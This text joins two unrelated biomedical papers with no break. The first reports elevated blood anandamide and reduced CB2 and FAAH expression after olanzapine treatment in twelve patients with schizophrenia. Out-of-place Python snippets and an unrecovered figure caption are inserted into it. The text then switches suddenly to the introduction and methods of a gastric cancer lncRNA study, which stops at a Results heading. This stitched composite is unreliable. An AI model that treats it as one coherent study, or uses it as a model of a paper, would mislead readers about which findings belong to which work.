We report that anandamide plasma levels are elevated in untreated patients with schizophrenia, and that the amounts of this compound as well as of CB~2~receptors and FAAH are decreased after a successful pharmacological treatment.
Results
=======
Psychiatric evaluation
----------------------
Table [1](#T1){ref-type="table"} displays the data related to the BPRS total score for all the patients included in the study. In addition, the patients in subgroup 1 have been rated as ranging from moderately ill to severely ill (CGI score from 4 to 6). All patients who were reassessed showed a statistically significant difference between the pre- and post-treatment scores at the BPRS and CGI, which dropped by more than 50% in all 5 cases considered (Table [1](#T1){ref-type="table"}). Patients 3, 5 and 8 in subgroup 2 scored 1 (much improved), whereas patients 6 and 7 in the same subgroup were evaluated as moderately improved (CGI score = 2).
######
BPRS and CGI scores and anandamide blood levels of the twelve patients with schizophrenia included in this study.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
**Patient Number** **Anandamide levels in the blood during the acute phase of schizophrenic illness (pmol/ml)** **Anandamide levels in the blood during remission of schizophrenic illness (pmol/ml)** **BPRS (and CGI) Scores Acute Remission**
-------------------- ---------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------- -------------------------------------------
1 11.7 59 (5)
2 7.3 64 (5)
3 8.4 4.4 68 (6) 25 (1)
4 8.2 48 (4)
5 6.3 6.2 60 (5) 20 (1)
6 5.3 2.2 66 (6) 29 (2)
7 7.7 4.1 56 (5) 26 (1)
8 6.7 2.5 70 (6) 29 (2)
9 7.5 55 (4)
10 9.7 57 (4)
11 8.7 56 (4)
12 6.0 52 (5)
**7.79 ± 0.50**\ **3.88 ± 0.72**\
**(P = 4.5 × 10^-8^*vs.*Control)** **(P = 0.16 *vs.*Control)**
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Five of these patients were assessed before and after remission of the symptoms (indicated by the significant decrease in the global BPRS and CGI scores) induced by treatment with olanzapine. CGI score ranged from 6 (severely affected) to 1 (much improved), and are shown in parentheses. The amount of anandamide in healthy volunteers (control) was 2.58 ± 0.28 pmol/ml (mean ± SEM, n = 20). Means were compared to the control by the unpaired Student\'s t test, threshold of significance was 0.95.
Anandamide, cannabinoid receptor and FAAH blood levels
------------------------------------------------------
Table [1](#T1){ref-type="table"} also shows the blood levels of anandamide in each of the twelve patients affected by schizophrenia. The mean ± SEM amounts of anandamide levels in the control volunteers and the patients with acute schizophrenia are also shown in Table [1](#T1){ref-type="table"} and in its legend. A statistically significant difference between the two groups was found, whereas the mean values for the patients in remission were not significantly different from those of the control subjects.
Clinical improvement, with the reduction in the BPRS and CGI scores, was paralleled by the decrease in both the levels of peripheral ANA (assessed in those 5 patients sampled before and after pharmacological treatment, Table [1](#T1){ref-type="table"}, Fig. [1](#F1){ref-type="fig"}) and of the intensity of the bands for the mRNA transcripts of FAAH and CB~2~(assessed in those 5 patients sampled before and after pharmacological treatment, Fig. [2](#F2){ref-type="fig"}). We did not observe any consistent difference for the CB~1~mRNA transcript, which appeared to be less expressed than that of CB~2~in all the blood samples analysed (Fig. [2b](#F2){ref-type="fig"}).
![Anandamide blood levels in the five patients assessed before and after pharmacological treatment (original caption not recovered)]{#F1}
![Semi-quantitative RT-PCR analysis. Lanes 1, 3, 5, 7 and 9: patients n° 3, 6, 8, 5 and 7 (Table [1](#T1){ref-type="table"}), in acute phase; lanes 2, 4, 6, 8 and 10: patients n° 3, 6, 8, 5 and 7, in remission. Panel A, B, C and D are relative to PCR analysis for β~2~-microglobulin (house-keeping), CB~1~, CB~2~and FAAH, respectively. The bands shown in the figure are from 20 (Panel A), 35 (Panel B), 30 (Panel C) and 30 (Panel D) PCR amplification cycles.](1476-511X-2-5-2){#F2}
Discussion
==========
Despite several suggestions that the EC system may play a role in the pathogenesis of schizophrenia \[[@B7],[@B9],[@B22]\], and the finding of elevated levels of anandamide in the CSF of patients suffering from schizophrenia \[[@B8]\], no study has addressed so far the question of whether the EC system is also altered in the serum and mononucleated cells from the blood of patients with this mental disorder. This issue is important in view of the several immunological correlates of schizophrenia, which include, among others, a shift from a Th-1-type to a Th-2-type immune response, a significant increase of activity of blood monocytes/macrophages, and a corresponding up-regulation of cytokine release \[[@B15]\]. Indeed, the ECs have a well-established immune-modulatory effect \[[@B23],[@B24],[@B20]\]. Thus, possible changes in the blood levels of these endogenous mediators could explain in part, or be a consequence of, the modified immune response observed in the course of schizophrenia. Furthermore, since the strong impact of acute schizophrenia on some immune functions can be attenuated by treatment with anti-psychotic drugs \[[@B15],[@B25]\], the effect of antipsychotic medications on the possible modifications of the EC system in the blood of these patients also needs to be assessed.
Our study suggests the existence of a significant alteration in the peripheral blood levels of schizophrenic patients of both the endocannabinoid anandamide and the mRNA for the anandamide degrading enzyme, FAAH. Furthermore, we found that the elevation of anandamide levels in our sample is confined to the acute phases of disease, to then normalize after a successful pharmacological treatment. Eventually, there were no statistically significant differences in anandamide levels between treated patients and controls. However, no direct correlation between anandamide blood levels and the BPRS or CGI scores of each patient, be it before or after remission, was found. Our results suggest that an acute psychotic episode might be characterised, among other factors, by an elevation in the peripheral concentration of anandamide, thus possibly inducing a compensatory increased expression of the degrading enzyme, FAAH, in an attempt to normalise their circulating levels. It is of interest that our patients consistently showed the same pattern, with their level of circulating anandamide forming two well-identifiable and distinct clusters at around 8 and 3 pmol/ml for group 1 and 2, respectively. Anti-psychotic medications seem to have played a crucial role in these patients by thwarting clinical symptoms on the one hand, and, in parallel, by reducing the levels of endocannabinoids and FAAH mRNA on the other hand. We did not identify any patients failing to respond to their pharmacological treatment, although it would have been interesting to measure the concentration of anandamide in the absence of an improved clinical presentation. This event would have carried important information as to whether decreased EC concentration was related to clinical amelioration or rather to pharmacological treatment per se, regardless of clinical outcome.
The peripheral elevation of anandamide levels might be related to the hypothesized anomaly of this signalling system in the brain of patients with schizophrenia, since these compounds can easily cross the blood brain barrier \[[@B10]\]. However, it is unlikely that changes in the peripheral amounts of ECs found in the blood can reflect to a great extent alterations occurring at the CNS level, in schizophrenia as well as other neurological and psychiatric disorders, since these compounds: (i) due to their lipophilicity act as autocrine/paracrine mediators, and no blood EC carrier protein has been identified to date; and (ii) are also produced by blood cells. More probably, the changes in anandamide blood levels found here might be a consequence, or alternatively one of the causative factors, of the previously observed immunological abnormalities in patients with schizophrenia \[[@B15]\]. For example, in view of the negative effect of leptin on endocannabinoid biosynthesis \[[@B26]\], and of the reduced levels of this hormone during acute schizophrenia \[[@B27]\], it is possible that reduced leptin causes the increased levels of blood anandamide observed in the schizophrenic patients investigated in the present study. This hypothetical mechanism would explain also why olanzapine was found here to lower EC levels back to those observed in healthy volunteers, since treatment of schizophrenia with this antipsychotic drug was shown previously to restore normal serum leptin levels \[[@B28]\]. Alternatively, since antipsychotics are also known to reduce the number and/or activity of leukocytes \[[@B15]\], it is possible that the reduced levels of anandamide following olanzapine treatment are a mere consequence of the reduced activity of lymphocytes and monocytes, which are normally capable of producing anandamide only after activation \[[@B19],[@B20],[@B29]\].
Regarding the reduction, also observed here, of cannabinoid CB~2~receptor mRNA following treatment with olanzapine, again this could be a consequence of reduced activity of blood leukocytes, since also CB~2~expression has been previously shown to be subject to regulation in activated macrophages and leukocytes \[[@B3]\]. Interestingly, also the function of G-proteins in the blood has been recently shown to be down-regulated after treatment with neuroleptic drugs \[[@B30],[@B31]\], and since CB~2~is a G-protein-coupled receptor \[[@B1],[@B10]\], it is likely that the reduction of the expression of this receptor detected after treatment with olanzapine and subsequent recovery from the symptoms of schizophrenia is also accompanied by a corresponding decrease of CB~2~receptor functionality.
Clearly, blood endocannabinoids cannot be regarded yet as possible markers of acute psychotic disorders, and even less as predictors of the patients\' response to antipsychotic medication. Furthermore, we did not test the specificity of ECs alterations to schizophrenia, and it may be that other major psychoses exhibit similar biochemical aberrations, and perhaps similar stage-related fluctuations. Therefore, our data warrant further investigations with the aim of better understanding the pathological relevance of this as well as of other correlative studies.
Conclusions
===========
The present study carries the following interesting and potentially important implications:
1\) It lends further support to the hypothesis of an involvement of the EC system in schizophrenia, clearly demonstrating an anomaly in three separate components of this system, an anomaly that, at least in our sample, appears to be associated with an acute phase of the illness. However, the small size of our sample warrants great caution when interpreting these results.
2\) It suggests that at least part of the immunological abnormalities observed during acute schizophrenia might correlate with changes in the \"output\" of the EC system in the blood.
Methods
=======
Study design, subjects and psychiatric assessment and treatment
---------------------------------------------------------------
A case-control study design was used. Subjects were selected from patients treated in the clinical facilities of the Department of Mental Health in Pomigliano, Naples, Italy, from January to December 2001. Patients were selected only if they showed, or were described in the medical records as affected by, symptoms of schizophrenia, and if they wished to take part in the study. After this first step, the recruited subjects received a diagnostic assessment, and only those meeting the DSM-IV criteria for schizophrenia \[[@B32]\] entered the study. Other necessary criteria for inclusion were: absence of previous or present neurological disorders, no abuse of cannabis in the year preceding the study, and absence of a significant learning disability (IQ\<85). All the patients included had to be in a well-controlled setting (namely, their family environment), where the absence of cannabis abuse and compliance with treatment could be assessed with a high degree of certainty. These strict criteria inevitably limited the number of patients included in the study.
The individuals in our research (n = 12) were split in two subgroups. In subgroup 1 were those in an acute phase of their schizophrenic illness, who had not received pharmacological treatment for at least 30 days prior to evaluation, 9 males and 3 females, with a mean age of 32.9 ± 7.0 years (range, 18--45 years), of Caucasian race (n = 12). All individuals received the Diagnostic Interview for Genetic Studies (DIGS; \[[@B33]\]), a semi-structured DSM IV interview. All patients were rated also by means of the Clinical Global Impression scale (CGI; \[[@B34]\]), and the treatment outcome was evaluated with the CGI-Improvement (CGI-I). We used the Brief Psychiatric Rating Scale (BPRS; 18-item version; \[[@B35]\]) to characterize the severity of the symptoms of the illness, where 1 indicates absent and 7 severe.
The second subgroup (n = 5) consisted of patients previously assigned to subgroup 1, who had been in clinical remission for at least one month, following a successful pharmacological treatment with olanzapine (patients 3 and 5 were on 20 mg/day, whereas subjects 6, 7 and 8 received 25 mg/day). The re-test procedure for the 5 probands was performed 92 ± 11 days after the assessment in the acute phase of the illness. Clinical remission was defined a priori as a reduction of at least 50% in the BPRS score and a clinical evaluation of 1 (much improved) or 2 (moderately improved) at the CGI-I score. In particular, patient Nr. 3 was investigated during the third episode of her disease. She had been treated with risperidone at the onset. We switched to olanzapine because of hyperprolactinemia. Her response to treatment was satisfactory with both medications, and she always achieved a nearly complete remission. Relapses were apparently caused by an excessive reduction or a spontaneous discontinuation of her medication regime. Patient Nr. 5 was suffering from the second episode of schizophrenia. We treated her with risperidone (first episode) and then olanzapine for the episode described here. The relapse was caused by her arbitrarily stopping her medication. Patient Nr. 6 was at his first episode of schizophrenia, which however had lasted for a prolonged time because it went untreated (more than a year). In fact, his family postponed his referral to mental health facilities because of fear of stigmatization. We started him on olanzapine 20 mg/day, but he needed 25 mg to show a satisfactory response (CGI from 6 to 2). Patient Nr. 7 had been experiencing several positive symptoms for two years, with serious consequences such as loss of his job. His schizophrenia did not respond to two classical antipsychotics administered by a previous psychiatrist. The initial 20 mg of olanzapine had to be titrated up to 25 to obtain the optimal response. Finally, patient Nr. 8 was treated with olanzapine from the time he was included in the study. He had previously not agreed to be treated, and had been suffering from several positive symptoms for approximately seven years. He only had occasional administrations of haloperidol, which was added to his food by the patient\'s wife without his being aware of it. In retrospect, there appeared to be no response because of these treatment inconsistencies.
Twenty normal controls were recruited from the medical and nursing staff at the Department of Mental Health in Pomigliano. They were in the same age range as the study patients, and were likewise comparable for level of education and gender representation. A normal IQ, absence of previous and present neurological disorders, and having not abused marijuana/exogenous cannabinoids were used as inclusion criteria for controls. The control subjects had no first-degree relative suffering from a major psychiatric disorder.
All subjects gave 10 ml blood for the laboratory testing. All blood samples were taken in the morning, from non-fasting subjects, and there were no feeding-related variables that could account for any possible difference in ECs levels between groups.
Biochemical analyses
--------------------
### Lipid Extraction
Peripheral blood samples (10 ml) were collected by vein suction in EDTA (25 mM final concentration) and processed no later than 3 hours after blood was drawn. For the LC-MS determinations, EDTA and phenyl-methyl-sulfonyl-fluoride (PMSF) (100 μM final concentration) were added to blood samples. PMSF is an inhibitor of fatty acid amide hydrolase (FAAH), and was added in order to prevent endocannabinoid degradation. Five ml of whole blood for each sample was carefully layered over 5 ml of *HISTOPAQUE*^®^1077 solution (SIGMA) in *ACCUSPIN*^®^tubes (SIGMA) and centrifuged at 400 × g for 30 min at room temperature. After centrifugation, erythrocytes and granulocytes sedimented at the bottom of the tube. After removal of the clear plasma layer from the top of the tube, the opaque layer (about 2 ml) containing the mononuclear cells was collected, resuspended by gentle aspiration in 10 ml of phosphate buffered saline (PBS) and centrifuged at 250 × g for 10 min at room temperature. The cell pellet was resuspended, washed twice in 5 ml of PBS and stored at -80°C for RNA extraction. For quantitative determinations, the plasma and the mononucleate cell layers were collected together, the proteins precipitated by adding 3 vol. of acetone, the supernatants were collected and subjected to lipid extraction with methanol/chloroform. Enough of each solvent was added to reach a final ratio buffer/methanol/chloroform of 1:1:2 (v/v/v). Methanol containing 5 pmol of d~8~-anandamide was added as internal standard. The organic phase was then dried under nitrogen and purified by means of open bed chromatography on silica gel \[[@B36],[@B37]\].
### Liquid chromatography-Atmospheric pressure chemical ionization-mass spectrometry (LC-APCI-MS) quantification of anandamide levels
The lipid extracts were analyzed by liquid chromatography-atmospheric pressure chemical ionization-mass spectrometry (LC-APCI-MS) by using a Shimadzu HPLC apparatus (LC-10ADVP) coupled to a Shimadzu (LCMS-2010) quadrupole MS via a Shimadzu APCI interface. MS analyses were carried out in the selected ion monitoring (SIM) mode as described previously \[[@B26]\]. The temperature of the APCI source was 400°C, the HPLC column was a Phenomenex (5 μm, 150 × 4.5 mm) reverse phase column, eluted as described \[[@B37]\]. Anandamide (retention time 14.5 min) was quantified by isotope dilution with the above-mentioned deuterated standards (same retention time and *m*/*z*= 356.3) and its amounts in pmoles normalized per ml of processed blood. Intra-assay variation using this method was 2.5 ± 0.3%, whereas inter-assay variation was 10.1 ± 2.5% (means ± SEM, n = 4).
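The isotope-dilution arithmetic described above reduces to scaling the analyte/standard peak-area ratio by the 5 pmol of spiked d~8~-anandamide and normalizing per ml of processed blood. A hedged sketch (the function name and all peak-area values are hypothetical, for illustration only):

```python
# Hypothetical illustration of the isotope-dilution quantification
# described above: 5 pmol of d8-anandamide internal standard spiked
# into 5 ml of processed blood; the peak areas are made-up numbers.

def anandamide_pmol_per_ml(area_analyte, area_standard,
                           spiked_pmol=5.0, blood_ml=5.0):
    # analyte amount (pmol) = peak-area ratio * spiked internal standard,
    # then normalized per ml of processed blood
    return (area_analyte / area_standard) * spiked_pmol / blood_ml

# e.g. an analyte peak 7.8x the deuterated standard's -> 7.8 pmol/ml
print(anandamide_pmol_per_ml(15600.0, 2000.0))
```

Because the deuterated standard co-elutes with anandamide, matrix and extraction losses cancel in the ratio, which is the point of the isotope-dilution design.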
### RNA extraction and semi-quantitative reverse transcriptase-polymerase chain reaction (RT-PCR) analyses
Total RNA was extracted from mononuclear cells by Trizol^®^reagent (Life Technologies) according to the manufacturer\'s instructions. To remove contaminant DNA, 4 μg of RNA samples were DNAse-digested utilizing the DNA-free^®^(Ambion) protocol. 2 μg of total RNA were reverse transcribed in a 20 μl reaction mixture containing: 75 mM KCl, 3 mM MgCl~2~, 10 mM dithiothreitol, 1 mM dNTPs, 50 mM Tris-HCl pH 8.3, 20 units of RNAse inhibitor (Roche), 0.125 A~260~units of hexanucleotide mixture (Roche) for random-priming and 200 units of reverse transcriptase (Superscript^®^, GIBCO). The reaction mixture was incubated at room temperature for 10 minutes and at 42°C for 90 min, then the reaction was stopped by heating at 95°C for 5 min, cooled on ice, and stored at -20°C. Control samples (no-RT) were prepared by omitting reverse transcriptase in the retrotranscription mixture. DNA amplification was performed in a 50 μl PCR reaction mixture containing: 0.5--2 μl of the retro-transcription mixture, 1X PCR buffer (supplied as component of the DNA polymerase kit), 2 mM MgCl~2~, 250 μM dNTPs, 0.5 μM each of 5\' and 3\' primers and 2.5 units of *Platinum*^®^*Taq*DNA polymerase (Life Technologies). The mixtures were amplified in a PE Gene Amp PCR System 2400 thermocycler (Perkin Elmer). The primers used were: CB~1~sense primer, 5\'-CAG AAG AGC ATC ATC CAC ACG TCT G-3\'; CB~1~antisense primer 5\'-ATG CTG TTA TCC AGA GGC TGC GCA GTG C-3\'; CB~2~sense primer 5\'-TTT CCC ACT GAT CCC CAA TG-3\'; CB~2~antisense primer 5\'-AGT TGA TGA GGC ACA GCA TG-3\'; FAAH sense primer 5\'-GCC TGG GAA GTG AAC AAA GGG ACC-3\'; FAAH antisense primer 5\'-CCA CTA CGC TGT CGC ACT CCG CCG-3\'; β~2~-microglobulin sense primer 5\'-CCA GCA GAG AAT GGA AAG TC-3\'; β~2~-microglobulin antisense primer 5\'-GAT GCT GCT TAC ATG TCT CG-3\'.
The amplification profile consisted of an initial denaturation of 2 min at 95°C and 20--35 cycles of 30 sec at 95°C, annealing for 30 sec at 55°C (β~2~-microglobulin) or at 60°C (CB~1~, CB~2~and FAAH) and elongation for 1 min at 72°C. A final extension of 10 min was carried out at 72°C. The expected sizes of the amplicons were 338 bp for CB~1~; 329 bp for CB~2~; 202 for FAAH and 269 bp for β~2~-microglobulin. The β~2~-microglobulin house-keeping gene expression was used to evaluate variations in the quality and content of the mRNA and to monitor cDNA synthesis in the different preparations. Furthermore the PCR primers for β~2~-microglobulin and FAAH were selected on the basis of the sequence of the β~2~-microglobulin gene (NCBI accession number M17987) by including the intron 402--1017, and of the sequence of the FAAH human gene (NCBI accession number AF098012) by including the intron 497--722. In the presence of contaminant genomic DNA, the expected size of the amplicon would be 426 and 885 bp for FAAH and β~2~-microglobulin, respectively. 10--20 μl of PCR products were electrophoresed on 2% agarose gel (MS agarose, Roche) in TAE buffer at 4 V/cm for 4 h. Ethidium bromide (0.1 μg/ml) was included both in the gel and electrophoresis buffer and PCR products were detected by UV visualization and recorded by photo (Polapan 55, Polaroid). Evaluation of the relative expression levels was performed by analysing the amount of amplicon synthesized at different numbers of amplification cycles for a fixed quantity of cDNA in the assay. In order to obtain a quantitative evaluation of the relative amounts of the mRNA transcripts, the different PCR reactions were performed with a different number of cycles. Differences in band intensities obtained using a non-saturating number of cycles, in relation to the intensity of the housekeeping mRNA transcript (i.e. 
β~2~-microglobulin, which works as an \"internal standard\"), are highly indicative of differences in the levels of expression of the corresponding genes.
Statistical analyses
--------------------
Results of the anandamide level measurements, expressed in pmol/ml of blood and as means ± SEM, were compared by the unpaired Student\'s t test. When data from patients before and after pharmacological treatment were compared, the paired Student\'s t test was used.
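The summary statistics reported in Table 1 can be re-derived from the per-patient values. As a cross-check (my own sketch in NumPy; the paper does not state what software was used), the following reproduces the mean ± SEM figures and the paired Student's t statistic for the five re-tested patients:

```python
import numpy as np

# Per-patient anandamide levels (pmol/ml) transcribed from Table 1.
acute = np.array([11.7, 7.3, 8.4, 8.2, 6.3, 5.3,
                  7.7, 6.7, 7.5, 9.7, 8.7, 6.0])
remission = np.array([4.4, 6.2, 2.2, 4.1, 2.5])        # patients 3, 5, 6, 7, 8
acute_retested = np.array([8.4, 6.3, 5.3, 7.7, 6.7])   # same five, acute phase

def mean_sem(x):
    # SEM uses the sample standard deviation (ddof=1)
    return x.mean(), x.std(ddof=1) / np.sqrt(len(x))

m_acute, sem_acute = mean_sem(acute)          # 7.79 +/- 0.50, as reported
m_rem, sem_rem = mean_sem(remission)          # 3.88 +/- 0.72, as reported

# Paired Student's t statistic for the five re-tested patients
d = acute_retested - remission
t_paired = d.mean() / (d.std(ddof=1) / np.sqrt(len(d)))
```

The paired statistic comes out near 4.0, above the two-tailed 0.05 critical value of 2.776 for df = 4, consistent with the reported significant decrease after treatment.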
Authors\' contributions
=======================
NDM, a senior psychiatrist, conceived this study, selected the patients and performed all clinical ratings, and was assisted by FD; VDM and LDP conceived and coordinated the study and took part in all biological assays; PO performed all molecular biology experiments; FF extracted the lipids from blood sample and measured the levels of anandamide by LC-MS. All authors have read and approved the manuscript.
######
Brief Psychiatric Rating (BPRS) Scale. Score for all the 18 items of the Brief Psychiatric Rating (BPRS) for each of the twelve patients with schizophrenia included in this study
**N° Patient** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18**
---------------- ------- ------- ------- ------- ------- ------- ------- ------- ------- -------- -------- -------- -------- -------- -------- -------- -------- --------
1 4 3 4 2 2 6 1 1 4 3 5 5 3 3 6 4 2 1
2 3 5 6 3 3 6 1 1 4 2 6 6 3 3 5 3 2 2
3 acute 5 6 4 3 3 7 2 1 3 1 7 5 4 2 6 2 1 6
3 remission 2 2 2 1 2 1 1 1 2 1 1 1 2 1 1 2 1 1
4 2 4 3 2 2 5 2 1 2 2 6 4 2 2 5 2 1 1
5 acute 2 6 2 2 1 7 1 1 2 2 6 6 2 2 7 2 1 2
5 remission 1 2 1 1 1 1 1 1 2 1 1 1 1 1 1 1 1 1
6 acute 3 5 5 2 2 5 4 1 3 1 5 6 6 4 6 5 1 1
6 remission 2 2 3 1 1 2 2 1 2 1 2 1 2 2 1 2 1 1
7 acute 2 3 5 2 4 5 1 1 4 1 3 4 4 3 6 6 1 1
7 remission 1 2 2 1 2 1 1 1 3 1 1 1 2 1 2 2 1 1
8 acute 4 5 5 3 3 6 2 1 2 6 6 7 4 4 7 3 1 1
8 remission 3 3 1 1 3 2 1 1 3 1 1 1 2 1 1 2 1 1
9 2 4 3 2 3 5 2 1 3 3 5 5 3 3 5 3 2 1
10 2 4 4 5 2 5 1 1 3 3 5 5 3 3 5 4 1 1
11 4 4 4 4 1 5 2 1 3 3 4 5 2 3 5 4 1 1
12 1 4 4 6 1 5 1 3 1 2 4 5 1 2 6 2 2 2
Acknowledgements
================
We thank Dr Alfredo Dama, MD, for useful advice and support, S. Guardascione and G. Capuano for assistance, and S. Piantedosi for the artwork. This study was supported by grant POP 98/5.4.2 from Regione Campania to LDP.
Introduction {#S0001}
============
Non-coding RNAs (ncRNAs) are emerging classes of non-protein-coding RNA transcripts with pivotal roles in gene regulation.[@CIT0001] It has been reported that more than 98% of all human genome transcriptional output is ncRNAs, and most ncRNAs are expressed in specific types of tissues and cells, under certain stress conditions or during specific developmental stages, indicating their extensive involvement in human body growth and development.[@CIT0002] Long non-coding RNAs, or lncRNAs, are a subgroup of ncRNAs longer than 200 nt.[@CIT0003] Functional characterization has revealed that lncRNAs not only participate in almost all important physiological processes, but also have critical functions in the development of diseases,[@CIT0004] such as different types of cancer.[@CIT0005],[@CIT0006] However, the function of most lncRNAs is still unknown.
Gastric cancer is one of the most frequently diagnosed malignancies and is also the third leading cause of cancer-related deaths worldwide.[@CIT0007] Most gastric cancer patients at early stages can be cured by surgical operations. However, more than half of patients with advanced gastric cancer will die of carcinoma recurrence even after curative gastrectomy.[@CIT0008] Therefore, more studies are needed to further characterize the molecular alterations involved in the pathogenesis of gastric cancer.[@CIT0009],[@CIT0010] Our genome-wide transcriptome analysis identified a large number of differentially expressed lncRNAs in gastric cancer patients (data not shown). Among these differentially expressed lncRNAs, lncRNA PTCSC3, which has been reported to be downregulated in papillary thyroid carcinoma,[@CIT0011] is also downregulated in gastric cancer and is positively correlated with lncRNA Linc-pint, a characterized tumor suppressor in lymphoblastic leukemia.[@CIT0012] Our study was therefore carried out to investigate the involvement of PTCSC3 and Linc-pint in gastric cancer and to explore possible interactions between them.
Materials and Methods {#S0002}
=====================
Research Subjects {#S0002-S2001}
-----------------
Our study included 78 patients with gastric cancer who were diagnosed and treated in the Fourth Hospital of Hebei Medical University from March 2010 to March 2015. Inclusion criteria: 1) gastric cancer patients diagnosed by pathological biopsy; 2) patients diagnosed for the first time who had received no prior treatment; 3) patients willing to participate. Exclusion criteria: 1) patients who received treatment before admission or who were transferred from other hospitals; 2) patients with other severe diseases, such as other types of cancer or systemic infection. The 78 patients included 43 females and 35 males, with ages ranging from 29 to 66 years (mean 48.6±6.1 years). According to AJCC staging, there were 16 cases at stage I, 22 at stage II, 24 at stage III and 16 at stage IV. This study was approved by the Ethics Committee of the Fourth Hospital of Hebei Medical University before patient admission, and all participants signed informed consent.
Specimen Collections and Cell Lines {#S0002-S2002}
-----------------------------------
Biopsy was performed to collect cancer and paracancerous tissues from each patient. Tissues were stored in liquid nitrogen before use.
SNU-1 and Hs 746T human gastric cancer cell lines were used in this study to perform in vitro experiments. Cells of these two cell lines were purchased from American Type Culture Collection (ATCC, Manassas, VA, USA). ATCC-formulated RPMI-1640 Medium (ATCC) supplemented with 10% fetal bovine serum (FBS, ATCC) was used to cultivate the cells of both cell lines at 37°C in a 5% CO~2~ incubator.
Follow-Up {#S0002-S2003}
---------
All patients were followed up for 5 years after admission to record their overall condition. Patients who failed to complete follow-up and patients who died of other causes during follow-up were excluded from this study.
Cell Transfections {#S0002-S2004}
------------------
A pcDNA3.1 vector (Invitrogen) expressing PTCSC3 or Linc-pint was designed and constructed by Sangon (Shanghai, China). Linc-pint siRNA and negative control siRNA were also designed and synthesized by Sangon. Cells of the SNU-1 and Hs 746T cell lines were cultivated overnight to reach 70--80% confluence. All cell transfections were performed using Lipofectamine 2000 reagent (cat no. 11668-019; Invitrogen; Thermo Fisher Scientific, Inc., Waltham, MA, USA) in strict accordance with the manufacturer's instructions. Doses of vectors and siRNAs were 10 and 45 nM, respectively. Un-transfected cells served as control cells, and cells transfected with empty pcDNA3.1 vectors or negative control siRNAs served as negative control cells. Cells were harvested at 24 h after transfection for subsequent experiments.
Total RNA Extraction and Reverse Transcription-Quantitative Polymerase Chain Reaction (RT-qPCR) {#S0002-S2005}
-----------------------------------------------------------------------------------------------
Tissues were ground in liquid nitrogen, followed by the addition of RNAzol reagent (Sigma-Aldrich, St. Louis, MO, USA) to extract total RNA. RNAzol reagent was also mixed directly with in vitro cultivated cells to extract total RNA. Total RNA was reverse transcribed using SuperScript IV Reverse Transcriptase (Thermo Fisher Scientific, Inc.). To detect the expression of PTCSC3 and Linc-pint, PCR reaction systems were prepared using Applied Biosystems™ PowerUp™ SYBR™ Green Master Mix (Thermo Fisher Scientific, Inc.) and all PCR reactions were performed on a CFX96 Touch Deep Well™ Real-Time PCR Detection System (Bio-Rad) with 18S RNA as the endogenous control. Primers for PTCSC3, Linc-pint and 18S RNA were designed and synthesized by Sangon (Shanghai, China). Expression of PTCSC3 and Linc-pint was normalized to 18S RNA using the 2^−ΔΔCq^ method.
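The 2^−ΔΔCq^ normalization used here can be sketched in a few lines. The Cq values below are purely illustrative placeholders, not data from this study:

```python
# Minimal sketch of the 2^-ddCq relative-quantification method.
# All Cq values are hypothetical placeholders, not study data.

def relative_expression(cq_target_sample, cq_ref_sample,
                        cq_target_calibrator, cq_ref_calibrator):
    """Fold change of the target gene in a sample vs a calibrator,
    normalized to a reference (endogenous control) gene."""
    d_sample = cq_target_sample - cq_ref_sample              # dCq in the sample
    d_calibrator = cq_target_calibrator - cq_ref_calibrator  # dCq in the calibrator
    return 2 ** -(d_sample - d_calibrator)                   # 2^-ddCq

# Example: PTCSC3 vs 18S, tumor tissue vs paired paracancerous tissue
fold = relative_expression(30.1, 12.0, 27.6, 12.1)
# fold < 1 would indicate downregulation in the tumor sample
```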
In vitro Cell Proliferation Assay {#S0002-S2006}
---------------------------------
Cells were harvested at 24 h after transfection and an in vitro cell proliferation assay was performed using the Cell Counting Kit-8 (CCK-8) kit (Sigma-Aldrich) to explore the effects of PTCSC3 and Linc-pint on gastric cancer cell proliferation. Briefly, cells were mixed with ATCC-formulated RPMI-1640 Medium containing 10% FBS to make single-cell suspensions. Cell density was adjusted to 4×10^4^ cells/mL and cell suspensions were transferred to a 96-well plate with 100 μL of cell suspension in each well. Cells were cultivated (37°C and 5% CO~2~) and 10 μL of CCK-8 solution was added into each well 24, 48, 72 and 96 hrs later. After that, cells were cultivated for an additional 4 hrs and 10 μL DMSO was added. OD values at 450 nm were measured to reflect cell proliferation rates.
Flow Cytometry {#S0002-S2007}
--------------
Cells were harvested at 24 hrs after transfection and flow cytometry was performed to explore the effects of PTCSC3 and Linc-pint on gastric cancer cell stemness. Cells were harvested by trypsinization. IgG1-PE or CD133-PE antibody (130-093-193, Miltenyi Biotec, Germany) was incubated with cells (5×10^5^ cells per mL) at 4°C for 20 mins. After that, cells were collected and resuspended in PBS. A FACS Aria system (BD Immunocytometry Systems, San Jose, CA, USA) was then used to detect signals and data were processed using Cell Quest software (Becton Dickinson Ltd).
Statistical Analysis {#S0002-S2008}
--------------------
All experiments were performed 3 times and data were recorded as mean ± standard deviation. Comparisons of expression levels of PTCSC3 and Linc-pint between cancer and paracancerous tissues were performed by paired *t* test. Correlations between expression levels of PTCSC3 and Linc-pint were analyzed by Pearson's correlation coefficient. Comparisons among multiple groups were performed by one-way ANOVA followed by Tukey's test. Based on the expression levels of PTCSC3 and Linc-pint in tumor tissues, patients were divided into high (n=36) and low (n=42) PTCSC3 level groups, as well as high (n=38) and low (n=40) Linc-pint level groups according to Youden's index. Survival curves were plotted by the Kaplan--Meier method and compared by log-rank test. Differences with p\<0.05 were considered statistically significant.
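As a minimal illustration of the correlation analysis described here, Pearson's r can be computed directly from its definition. The expression values below are hypothetical, not patient data:

```python
import math

def pearson_r(xs, ys):
    """Pearson's correlation coefficient from its definition."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sx = math.sqrt(sum((x - mx) ** 2 for x in xs))
    sy = math.sqrt(sum((y - my) ** 2 for y in ys))
    return cov / (sx * sy)

# Hypothetical relative expression levels in five tumor samples
ptcsc3 = [0.2, 0.5, 0.9, 1.4, 1.8]
linc_pint = [0.3, 0.6, 1.0, 1.2, 2.0]
r = pearson_r(ptcsc3, linc_pint)
# r near +1 would be consistent with a significant positive correlation
```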
Results {#S0003}
=======
PTCSC3 and Linc-pint Were Both Downregulated in Cancer Tissues of Gastric Cancer Patients {#S0003-S2001}
-----------------------------------------------------------------------------------------
